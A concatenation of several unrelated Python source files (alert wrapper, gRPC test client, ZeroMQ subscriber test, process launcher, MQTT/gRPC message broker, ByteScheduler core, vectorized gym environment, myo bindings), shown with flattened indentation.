message: The message of the alert.
"""
alert = Alert()
if __platform__ is iOS:
alert.pyAlert.title = title
alert.pyAlert.message = message
elif __platform__ is macOS:
alert.nsAlert.informativeText = title
alert.nsAlert.messageText = message
return alert
__actions__ = []
def addAction(self, title):
"""
Add an action with given title.
Args:
title: The title of the action.
"""
if __platform__ is iOS:
self.pyAlert.addAction(title)
else:
self.nsAlert.addButtonWithTitle(title)
self.__actions__.append(title)
def addDestructiveAction(self, title):
"""
Add a destructive action with given title.
Args:
title: The title of the action.
"""
if __platform__ is macOS:
raise NotImplementedError("`addDestructiveAction` cannot be used on macOS. Use `addAction`.")
self.pyAlert.addDestructiveAction(title)
def addCancelAction(self, title):
"""
            Add a cancel action with given title. Can only be added once.
Args:
title: The title of the action.
"""
if __platform__ is macOS:
raise NotImplementedError("`addCancelAction` cannot be used on macOS. Use `addAction`.")
if not self.pyAlert.addCancelAction(title):
raise ValueError("There is already a cancel action.")
def show(self):
"""
Shows alert.
Returns the title of the selected action.
"""
if __platform__ is iOS:
return self.pyAlert._show()
elif __platform__ is macOS:
return self.__actions__[self.nsAlert.runModal()-1000]
else:
PyAlert = None
Alert = None
|
_client_application.py | # Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An example gRPC Python-using client-side application."""
import collections
import enum
import threading
import time
import grpc
from tests.unit.framework.common import test_constants
from tests.testing.proto import requests_pb2
from tests.testing.proto import services_pb2
from tests.testing.proto import services_pb2_grpc
from tests.testing import _application_common
@enum.unique
class Scenario(enum.Enum):
UNARY_UNARY = 'unary unary'
UNARY_STREAM = 'unary stream'
STREAM_UNARY = 'stream unary'
STREAM_STREAM = 'stream stream'
CONCURRENT_STREAM_UNARY = 'concurrent stream unary'
CONCURRENT_STREAM_STREAM = 'concurrent stream stream'
CANCEL_UNARY_UNARY = 'cancel unary unary'
CANCEL_UNARY_STREAM = 'cancel unary stream'
INFINITE_REQUEST_STREAM = 'infinite request stream'
class Outcome(collections.namedtuple('Outcome', ('kind', 'code', 'details'))):
"""Outcome of a client application scenario.
Attributes:
kind: A Kind value describing the overall kind of scenario execution.
code: A grpc.StatusCode value. Only valid if kind is Kind.RPC_ERROR.
details: A status details string. Only valid if kind is Kind.RPC_ERROR.
"""
@enum.unique
class Kind(enum.Enum):
SATISFACTORY = 'satisfactory'
UNSATISFACTORY = 'unsatisfactory'
RPC_ERROR = 'rpc error'
_SATISFACTORY_OUTCOME = Outcome(Outcome.Kind.SATISFACTORY, None, None)
_UNSATISFACTORY_OUTCOME = Outcome(Outcome.Kind.UNSATISFACTORY, None, None)
class _Pipe(object):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._open = True
def __iter__(self):
return self
def _next(self):
with self._condition:
while True:
if self._values:
return self._values.pop(0)
elif not self._open:
raise StopIteration()
else:
self._condition.wait()
def __next__(self): # (Python 3 Iterator Protocol)
return self._next()
def next(self): # (Python 2 Iterator Protocol)
return self._next()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def close(self):
with self._condition:
self._open = False
self._condition.notify_all()
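# _Pipe is a thread-safe blocking iterator: producers call add()/close() while
# a consumer (e.g. a gRPC request iterator) blocks in next() until a value
# arrives or the pipe is closed. A minimal sketch:
#   pipe = _Pipe(); pipe.add('x'); pipe.close(); assert list(pipe) == ['x']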
def _run_unary_unary(stub):
response = stub.UnUn(_application_common.UNARY_UNARY_REQUEST)
if _application_common.UNARY_UNARY_RESPONSE == response:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_unary_stream(stub):
response_iterator = stub.UnStre(_application_common.UNARY_STREAM_REQUEST)
try:
next(response_iterator)
except StopIteration:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_stream_unary(stub):
response, call = stub.StreUn.with_call(
iter((_application_common.STREAM_UNARY_REQUEST,) * 3))
if (_application_common.STREAM_UNARY_RESPONSE == response and
call.code() is grpc.StatusCode.OK):
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_stream_stream(stub):
request_pipe = _Pipe()
response_iterator = stub.StreStre(iter(request_pipe))
request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
first_responses = next(response_iterator), next(response_iterator),
request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
second_responses = next(response_iterator), next(response_iterator),
request_pipe.close()
try:
next(response_iterator)
except StopIteration:
unexpected_extra_response = False
else:
unexpected_extra_response = True
if (first_responses == _application_common.TWO_STREAM_STREAM_RESPONSES and
second_responses == _application_common.TWO_STREAM_STREAM_RESPONSES
and not unexpected_extra_response):
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_concurrent_stream_unary(stub):
future_calls = tuple(
stub.StreUn.future(
iter((_application_common.STREAM_UNARY_REQUEST,) * 3))
for _ in range(test_constants.THREAD_CONCURRENCY))
for future_call in future_calls:
if future_call.code() is grpc.StatusCode.OK:
response = future_call.result()
if _application_common.STREAM_UNARY_RESPONSE != response:
return _UNSATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
else:
return _SATISFACTORY_OUTCOME
def _run_concurrent_stream_stream(stub):
condition = threading.Condition()
outcomes = [None] * test_constants.RPC_CONCURRENCY
def run_stream_stream(index):
outcome = _run_stream_stream(stub)
with condition:
outcomes[index] = outcome
condition.notify()
for index in range(test_constants.RPC_CONCURRENCY):
thread = threading.Thread(target=run_stream_stream, args=(index,))
thread.start()
with condition:
while True:
if all(outcomes):
for outcome in outcomes:
if outcome.kind is not Outcome.Kind.SATISFACTORY:
return _UNSATISFACTORY_OUTCOME
else:
return _SATISFACTORY_OUTCOME
else:
condition.wait()
def _run_cancel_unary_unary(stub):
response_future_call = stub.UnUn.future(
_application_common.UNARY_UNARY_REQUEST)
initial_metadata = response_future_call.initial_metadata()
cancelled = response_future_call.cancel()
if initial_metadata is not None and cancelled:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_infinite_request_stream(stub):
def infinite_request_iterator():
while True:
yield _application_common.STREAM_UNARY_REQUEST
response_future_call = stub.StreUn.future(
infinite_request_iterator(),
timeout=_application_common.INFINITE_REQUEST_STREAM_TIMEOUT)
if response_future_call.code() is grpc.StatusCode.DEADLINE_EXCEEDED:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
_IMPLEMENTATIONS = {
Scenario.UNARY_UNARY: _run_unary_unary,
Scenario.UNARY_STREAM: _run_unary_stream,
Scenario.STREAM_UNARY: _run_stream_unary,
Scenario.STREAM_STREAM: _run_stream_stream,
Scenario.CONCURRENT_STREAM_UNARY: _run_concurrent_stream_unary,
Scenario.CONCURRENT_STREAM_STREAM: _run_concurrent_stream_stream,
Scenario.CANCEL_UNARY_UNARY: _run_cancel_unary_unary,
Scenario.INFINITE_REQUEST_STREAM: _run_infinite_request_stream,
}
def run(scenario, channel):
stub = services_pb2_grpc.FirstServiceStub(channel)
try:
return _IMPLEMENTATIONS[scenario](stub)
except grpc.RpcError as rpc_error:
return Outcome(Outcome.Kind.RPC_ERROR,
rpc_error.code(), rpc_error.details())
|
test.py | import time
import zmq
import threading
import sys
groupname = "test"
latestNumber = None
received = 0
subscribers = 0
firstReceived = 0
numberOfSubscribers = 1024
def recv():
global latestNumber, received, firstReceived
ctx = zmq.Context()
socket = ctx.socket(zmq.SUB)
socket.setsockopt(zmq.SUBSCRIBE, groupname.encode("ascii"))
# https://github.com/zeromq/libzmq/issues/2882
socket.setsockopt(zmq.TCP_KEEPALIVE, 1)
socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, 10)
socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 1)
socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, 1)
socket.connect("tcp://34.73.146.178:5556")
while True:
time.sleep(0.1)
topic, msg = socket.recv_multipart()
number = msg.decode()
if latestNumber != number:
firstReceived = time.time()
received = 1
latestNumber = number
print("Reset")
else:
received += 1
def observe():
global latestNumber, received, firstReceived
while True:
print(received * 100 / numberOfSubscribers, "%")
time.sleep(1)
for i in range(numberOfSubscribers):
t = threading.Thread(target=recv)
t.start()
subscribers += 1
t = threading.Thread(target=observe)
t.start()
print(f"Created {subscribers} subscribers")
|
tx_test.py | from multiprocessing import Process
import time, os, threading
def start_tx(name):
os.system('python3 {name}'.format(name=name))
def kill_tx(name):
temp_filename = 'tmp_pid'
os.system('ps -ef | grep {name} > {temp_filename}'.format(name=name,temp_filename=temp_filename))
with open(temp_filename, 'r') as tmp:
lines = tmp.readlines()
for line in lines:
            components = line.split()
            curr_name = components[-1]
            curr_command = components[-2]
            if curr_name == name and curr_command == 'python3':
                pid = components[1]
os.system('kill -9 {pid}'.format(pid=pid))
os.system('rm -f {temp_filename}'.format(temp_filename=temp_filename))
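# Note: parsing `ps -ef` output is fragile; where available, a single
# `pkill -9 -f sdr_code.py` (sketch) achieves the same effect.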
if __name__ == '__main__':
name = 'sdr_code.py'
threading.Thread(target=start_tx, args=(name,)).start()
time.sleep(3)
kill_tx(name)
|
message-broker.py | import datetime
import json
import os
import sys
import paho.mqtt.client as mqtt
import multiprocessing
import grpc
import fxgateway_pb2
import fxgateway_pb2_grpc
if sys.version_info >= (3, 0):
from http.server import BaseHTTPRequestHandler, HTTPServer
else:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
# register topic + gateway address
topic_name = "gRPC"
gateway = "[GW_SERVER_ADDRESS]" # "10.0.0.183:31113"
gateway_ip = "[GW_SERVER_IP]" # "10.0.0.183"
gateway_port = "[GW_PORT_NUMBER]" # "31113"
if len(sys.argv) < 2:
print("Input Command : python message-broker.py [SERVERLESS_FUNCTION_NAME]")
sys.exit()
class MyHandler(BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes("<html><head><title>GET response</title></head>\n", "utf-8"))
s.wfile.write(bytes("</body></html>\n", "utf-8"))
def do_POST(s):
content_length = int(s.headers['Content-Length'])
post_data = s.rfile.read(content_length)
print("===========HTTP===========")
print(s.headers)
print(post_data.decode())
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def HTTP_Receiver():
    httpd = HTTPServer((gateway_ip, int(gateway_port)), MyHandler)
try:
print ("HTTP Server Start - " + gateway_ip + " : " + gateway_port)
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
def MQTT_Receiver():
client = mqtt.Client()
client.connect(gateway_ip)
# register subscribe
def on_connect(client, userdata, flags, rc):
print("Using gateway {} and topic {}".format(gateway, topic_name))
client.subscribe(topic_name)
    # process received message from the OpenFx gateway
def on_message(client, userdata, msg):
# gRPC
channel = grpc.insecure_channel(gateway)
stub = fxgateway_pb2_grpc.FxGatewayStub(channel)
servicerequest = fxgateway_pb2.InvokeServiceRequest(Service=sys.argv[1], Input=str(msg.payload.decode("utf-8")))
r = stub.Invoke(servicerequest)
print(r.Msg)
client.on_connect = on_connect
client.on_message = on_message
client.loop_forever()
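# To exercise the broker (sketch; gateway address and topic assumed from the
# placeholders above), publish a message to the registered topic, e.g.:
#   mosquitto_pub -h <gateway_ip> -t gRPC -m '{"hello": "world"}'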
if __name__ == '__main__':
process_mqtt_receiver = multiprocessing.Process(target=MQTT_Receiver)
process_mqtt_receiver.daemon = True
process_mqtt_receiver.start()
process_http_receiver = multiprocessing.Process(target=HTTP_Receiver)
process_http_receiver.daemon = True
process_http_receiver.start()
process_http_receiver.join()
process_mqtt_receiver.join() |
bytecore.py | #!/usr/bin/python
from __future__ import absolute_import
import sys
try:
import queue
except ImportError:
import Queue as queue
import threading
import logging
import collections
from .bytetask import ByteTask
from .tuner import Tuner
from .profiler import Profiler
import os
class ByteCore(object):
"""The core of ByteScheduler. Once Core gets a ByteTask (which represents a communication operation, e.g., push,
allreduce), it partitions the ByteTask and decides when to send each partition according to priority."""
def __init__(self, logger=None):
"""
Args:
logger: ByteScheduler logger object
"""
if logger is None:
self._logger = logging.getLogger("ByteScheduler")
else:
self._logger = logger
# A priority queue of ByteTask, tasks are sorted according to its priority.
self._queue = queue.PriorityQueue()
# Scheduler thread
self._scheduler = threading.Thread(target=self._loop, args=())
self._scheduler.daemon = True
self._is_started = False
# DATA represents normal tasks and EXIT signals the scheduler thread to be terminated.
self._commands = {'DATA': 0, 'EXIT': 1}
# Control credit
self._condition = threading.Condition(threading.Lock())
# Pending tasks that are not ready
self._pending = set()
self._pending_lock = threading.Lock()
# Only used to avoid task being garbage collected before completion.
self._running = set()
self._finished = collections.OrderedDict()
# The rank of a worker
self._rank = None
# The communication architecture used, e.g., ps or allreduce.
self._arch = None
# Partition unit, i.e., the number of parameters
self._partition = int(os.environ.get('BYTESCHEDULER_PARTITION', 1000000))
# Credit, i.e., the max number of unacknowledged parameters
self._credit = float(os.environ.get('BYTESCHEDULER_CREDIT', 4000000))
self._credit_limit = self._credit
# We expect that the first key is same across iterations and we use it to count how many training steps have
# been run.
self._first_key = None
self._step = 0
# Tuning
self._credit_tuning = int(os.environ.get('BYTESCHEDULER_CREDIT_TUNING', 1))
self._partition_tuning = int(os.environ.get('BYTESCHEDULER_PARTITION_TUNING', 0))
self._tuner = None
# hyper parameters of auto-tuning.
self._current_point = {
"credit": self._credit,
"partition": self._partition,
}
self._next_point = None
# profiling
self._timeline = os.environ.get('BYTESCHEDULER_TIMELINE', '')
self._profiler = None
def start(self, rank, arch):
"""Start core.
Args:
rank: the rank of the worker
arch: the communication architecture, "ps" or "allreduce"
"""
if self._is_started:
self._logger.warning("Core is already started.")
return
self._rank = rank
# Setup profiler
if self._rank == 0 and self._timeline:
self._logger.info("rank {}: profiler is enabled.".format(self._rank))
self._profiler = Profiler(self._timeline)
else:
self._profiler = Profiler('')
assert arch == "ps" or arch == "allreduce", arch + " not supported!"
self._arch = arch
# Support tuning partition for allreduce
if self._partition_tuning:
assert arch == "allreduce", "Do not support partition tuning for ps."
self._current_point["partition"] = self._partition
if (rank == 0 and self._credit_tuning) or self._partition_tuning:
self._tuner = Tuner(rank=self._rank, arch=arch, credit_tuning=self._credit_tuning,
partition_tuning=self._partition_tuning, logger=self._logger)
self._scheduler.start()
self._is_started = True
self._logger.info(
"start Core {}: credit {}, partition {}, credit tuning {}, partition tuning {}.".format(
self._rank, self._credit, self._partition, self._credit_tuning, self._partition_tuning))
def shutdown(self, wait_for_all=False):
"""Shut Core down.
Args:
wait_for_all: Flag indicating whether to wait completion of undone tasks.
"""
if not self._is_started:
self._logger.warning("Core is already shutdown.")
return
        if wait_for_all:
            self._queue.put((sys.maxsize, self._commands['EXIT'], None))
        else:
            self._queue.put((-sys.maxsize, self._commands['EXIT'], None))
        with self._condition:
            self._credit = sys.maxsize
            self._condition.notify_all()
self._scheduler.join()
self._is_started = False
        if self._tuner:
            self._tuner.exit()
self._profiler.stop()
self._logger.info("shutdown Core {}.".format(self._rank))
def post(self, task):
"""Post a communication task to Core for scheduling.
Args:
task: a ByteTask object
Returns:
A boolean value indicating whether the task is successfully posted
"""
if not self._is_started:
self._logger.error("Core is not running, call start first!")
return False
if not isinstance(task, ByteTask):
self._logger.error(
"{} is not an instance of ByteTask!".format(task.desc))
return False
else:
# Set the first key and use it to count number of training steps.
if not self._first_key:
self._first_key = task.name
if self._first_key == task.name:
self._step += 1
if self._tuner:
self._tune()
# Partition a task if its tensor is larger than a threshold.
if task.tensor_size() > self._partition:
subtasks = task.partition(size=self._partition)
else:
subtasks = [task]
# A task will bypass scheduling and start immediately after partition if immediate is True.
if task.is_immediate():
# The callback runs after an immediate task is finished.
def _end_callback(t, self):
with self._condition:
self._running.remove(t)
self._finished[t.name] = t
self._profiler.put(t.name, t.op + 'COMMUNICATION', 'E')
for t in subtasks:
with self._condition:
self._running.add(t)
self._profiler.put(t.name, t.op + 'COMMUNICATION', 'B')
t.immediate_do(callback=_end_callback, callback_context=self)
return True
# The callback runs when a non-immediate task is ready.
def _start_callback(task, self):
with self._pending_lock:
self._pending.remove(task)
self._profiler.put(task.name, task.op + 'QUEUE', 'B')
with self._condition:
self._queue.put((task.priority, self._commands['DATA'], task))
self._condition.notify_all()
self._logger.debug(
"{} has been posted into Core with priority {}".format(task.desc, task.priority))
# Prepare the task, i.e., add dependency Proxies.
for t in subtasks:
with self._pending_lock:
self._pending.add(t)
t.prepare(callback=_start_callback, callback_context=self)
return True
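    # Typical lifecycle (sketch): core.start(rank, arch); core.post(task) for
    # each tensor as it becomes ready; core.shutdown(wait_for_all=True) once
    # training ends.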
def _loop(self):
"""The main scheduling logic is a while loop that pops a task from queue each time and do it if credit is enough.
The credit decreases when a task is running and increases when a task is finished.
"""
# The callback runs when a non-immediate task is finished.
def _end_callback(task, self):
with self._condition:
self._credit += task.tensor_size()
if self._credit > self._credit_limit:
self._credit = self._credit_limit
self._running.remove(task)
self._condition.notify_all()
self._finished[task.name] = task
self._profiler.put(task.name, task.op + 'COMMUNICATION', 'E')
while True:
with self._condition:
while True:
try:
priority, cmd, task = self._queue.get(False)
                    except queue.Empty:
# wait for (potential) new task
self._condition.wait()
continue
if task and self._credit <= 0:
self._queue.put((priority, cmd, task))
# wait for (potential) new credit
self._condition.wait()
else:
break
if cmd == self._commands['EXIT']:
break
else:
self._profiler.put(task.name, task.op + 'QUEUE', 'E')
with self._condition:
self._running.add(task)
self._credit -= task.tensor_size()
task.do(callback=_end_callback, callback_context=self)
self._profiler.put(task.name, task.op + 'COMMUNICATION', 'B')
def _tune(self):
if self._tuner.stopped and self._next_point is None:
self._tuner.exit()
return
# Only rank 0 runs auto-tuning algorithm
if self._rank == 0:
self._tuner.record(self._current_point, self._step)
if self._next_point is None:
self._next_point = self._tuner.next_point()
if self._next_point is not None and self._step == self._next_point["step"]:
with self._condition:
if "credit" in self._next_point:
self._credit_limit = self._next_point["credit"]
self._credit = self._next_point["credit"]
self._logger.info("core {}: autotuning sets credit to {}K at training step {}.".format(
self._rank, int(self._credit / 1000), self._step))
if "partition" in self._next_point:
# Assign the attribute that post() consults when partitioning tasks.
self._partition = self._next_point["partition"]
self._logger.info("core {}: autotuning sets partition to {}K at training step {}.".format(
self._rank, int(self._partition / 1000), self._step))
self._current_point = self._next_point
self._next_point = None
# Init a core once the module is imported
core = ByteCore()
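# A minimal usage sketch (assumes a started Core and a concrete ByteTask,
# neither of which is defined in this file):
#
#   core.post(task)                   # schedule a communication task
#   core.shutdown(wait_for_all=True)  # drain pending tasks, then exit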
|
subproc_vec_env.py | from copy import deepcopy
import multiprocessing
from collections import OrderedDict
import gym
import numpy as np
import time
from .base_vec_env import VecEnv, CloudpickleWrapper
from .tile_images import tile_images
from .util import flatten_obs
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == 'step':
observation, reward, done, info = env.step(data)
remote.send((observation, reward, done, info))
elif cmd == 'reset':
observation = env.reset()
remote.send(observation)
elif cmd == 'render':
remote.send(env.render(*data[0], **data[1]))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'env_method':
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == 'get_attr':
remote.send(getattr(env, data))
elif cmd == 'set_attr':
remote.send(setattr(env, data[0], data[1]))
elif cmd == 'get_obs':
remote.send(env.get_obs())
elif cmd == 'set_env_state':
remote.send(env.set_env_state(data))
elif cmd == 'get_env_state':
state = env.get_env_state()
remote.send(state)
elif cmd == 'rollout':
obs_vec, rew_vec, act_vec, done_vec, info, next_obs_vec = env.rollout(*data)
remote.send((obs_vec, rew_vec, act_vec, done_vec, info, next_obs_vec))
elif cmd == 'seed':
remote.send(env.seed(data))
elif cmd == 'get_seed':
remote.send((env.seed))
elif cmd == 'randomize_dynamics':
default_params, randomized_params = env.randomize_dynamics(data)
remote.send((default_params, randomized_params))
else:
raise NotImplementedError
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow
sessions or other non thread-safe libraries are used in the parent (see issue #217).
However, compared to 'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods,
users must wrap the code in an ``if __name__ == "__main__":``
For more information, see the multiprocessing documentation.
:param env_fns: ([Gym Environment]) Environments to run in subprocesses
:param start_method: (str) method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'fork' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns, start_method=None):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
fork_available = 'fork' in multiprocessing.get_all_start_methods()
start_method = 'fork' if fork_available else 'spawn'
ctx = multiprocessing.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True)
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
if actions.ndim > 1:
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
else:
for remote in self.remotes:
remote.send(('step', actions))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
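# A minimal usage sketch (assumes `make_env` returns a thunk that builds a
# gym.Env; the name is illustrative, and step() is provided by the VecEnv
# base class as step_async() followed by step_wait()):
#
#   vec_env = SubprocVecEnv([make_env(i) for i in range(4)])
#   obs = vec_env.reset()
#   obs, rews, dones, infos = vec_env.step(actions)
#   vec_env.close()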
def rollout(self, num_particles, horizon, mean, noise, mode="open_loop"):
"""
Rollout the environments to a horizon given open loop action sequence
:param u_vec
"""
self.rollout_async(num_particles, horizon, mean, noise, mode)
return self.rollout_wait()
def rollout_async(self, num_particles, horizon, mean, noise, mode="open_loop"):
assert num_particles % len(self.remotes) == 0, "Number of particles must be divisible by number of cpus"
batch_size = int(num_particles / len(self.remotes)) #int(noise.shape[0]/len(self.remotes))
for i,remote in enumerate(self.remotes):
#Note: this will change if noise is weight matrix
delta_i = noise[i*batch_size: (i+1)*batch_size, :, :].copy() if noise is not None else None
remote.send(('rollout', (batch_size, horizon, mean, delta_i, mode)))
self.waiting = True
def rollout_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs_vec = [res[0] for res in results]
rew_vec = [res[1] for res in results]
act_vec = [res[2] for res in results]
done_vec = [res[3] for res in results]
info = [res[4] for res in results]
next_obs_vec = [res[5] for res in results]
stacked_obs = np.concatenate(obs_vec, axis=0)
stacked_rews = np.concatenate(rew_vec, axis=0)
stacked_acts = np.concatenate(act_vec, axis=0)
stacked_done = np.concatenate(done_vec, axis=0)
stacked_next_obs = np.concatenate(next_obs_vec, axis=0)
return stacked_obs, stacked_rews, stacked_acts, stacked_done, info, stacked_next_obs
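# A hedged usage sketch; shapes are inferred from the slicing in
# rollout_async above (noise is split along its first axis per worker):
#
#   noise: (num_particles, horizon, act_dim) array, or None
#   obs, rews, acts, dones, infos, next_obs = vec_env.rollout(
#       num_particles=32, horizon=50, mean=mean, noise=noise)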
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
return flatten_obs(obs, self.observation_space)
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for process in self.processes:
process.join()
self.closed = True
def render(self, mode='human', *args, **kwargs):
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(('render', (args, {'mode': 'rgb_array', **kwargs})))
imgs = [pipe.recv() for pipe in self.remotes]
# Create a big image by tiling images from subprocesses
bigimg = tile_images(imgs)
if mode == 'human':
import cv2
cv2.imshow('vecenv', bigimg[:, :, ::-1])
cv2.waitKey(1)
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_obs(self):
for remote in self.remotes:
remote.send(('get_obs', None))
observations = [remote.recv() for remote in self.remotes]
stacked_obs = np.vstack(observations)
return stacked_obs
# --------------------------------
# get and set states
# --------------------------------
def set_env_state(self, state_dicts):
"""
Set the state of all envs given a list of
state dicts
If only one state is provided, we set state of all envs to that
else each env must be provided one state
"""
if isinstance(state_dicts, list):
num_states = len(state_dicts)
assert num_states == 1 or num_states == len(self.remotes), \
"num states should equal 1 (same for all envs) or 1 per env"
if num_states == 1:
state_dicts = [deepcopy(state_dicts[0]) for j in range(len(self.remotes))]
else:
# A single state dict was provided; replicate it for every env.
state_dicts = [deepcopy(state_dicts) for _ in range(len(self.remotes))]
for i,remote in enumerate(self.remotes):
remote.send(('set_env_state', state_dicts[i]))
for remote in self.remotes:
remote.recv()
def get_env_state(self):
for remote in self.remotes:
remote.send(('get_env_state', None))
states = [remote.recv() for remote in self.remotes]
return states
def get_images(self):
for pipe in self.remotes:
# Send the (args, kwargs) payload format that the 'render' branch in _worker expects.
pipe.send(('render', ((), {'mode': 'rgb_array'})))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name, indices=None):
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('get_attr', attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name, value, indices=None):
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('set_attr', (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name, *method_args, indices=None, **method_kwargs):
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('env_method', (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices):
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: (None,int,Iterable) refers to indices of envs.
:return: ([multiprocessing.Connection]) Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def seed(self, seed_list):
assert len(seed_list) == len(self.remotes), "Each environment must be provided a seed"
for i,remote in enumerate(self.remotes):
remote.send(('seed', seed_list[i]))
results = [remote.recv() for remote in self.remotes]
def randomize_dynamics(self, param_dict, base_seed):
seed_list = [base_seed + i*12345 for i in range(len(self.remotes))]
self.seed(seed_list)
for i,remote in enumerate(self.remotes):
remote.send(('randomize_dynamics', param_dict))
results = [remote.recv() for remote in self.remotes]
default_params = [res[0] for res in results]
randomized_params = [res[1] for res in results]
return default_params, randomized_params |
__init__.py | # Copyright (c) 2015 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
:mod:`myo` - Python bindings for the Myo SDK
============================================
.. author:: Niklas Rosenstein <rosensteinniklas(at)gmail.com>
.. license:: MIT
"""
__author__ = 'Niklas Rosenstein <rosensteinniklas@gmail.com>'
__version__ = '0.2.0'
__license__ = 'MIT'
from .lowlevel import enums
from .lowlevel.enums import *
__all__ = [
'Hub', 'DeviceListener', 'Event', 'myo_init', 'myo_initialized',
# Backwards compatibility
'init_myo', 'event_type', 'pose', 'locking_policy'] + enums.__all__
# The version of the Myo SDK that the library was most recently
# updated for.
myo_sdk_version = '0.8.1'
from . import lowlevel as _myo
from .lowlevel import error, ResultError, InvalidOperation
from .vector import Vector
from .quaternion import Quaternion
from .device_listener import DeviceListener
import time
import threading
import traceback
import sys
init = myo_init = _myo.lib.init
myo_initialized = _myo.lib.initialized
class Hub(object):
"""
High-level interface for the Myo Hub which manages data processing
and event triggering for a Myo device.
.. note::
There can only be one Hub instance. The constructor of the
:class:`Hub` class will return the existing instance if
it has not been shut down since then.
"""
def __init__(self):
super(Hub, self).__init__()
self._lock = threading.RLock()
self._hub = _myo.Hub()
self._running = False
self._stopped = False
self._exception = None
self._thread = None
def __str__(self):
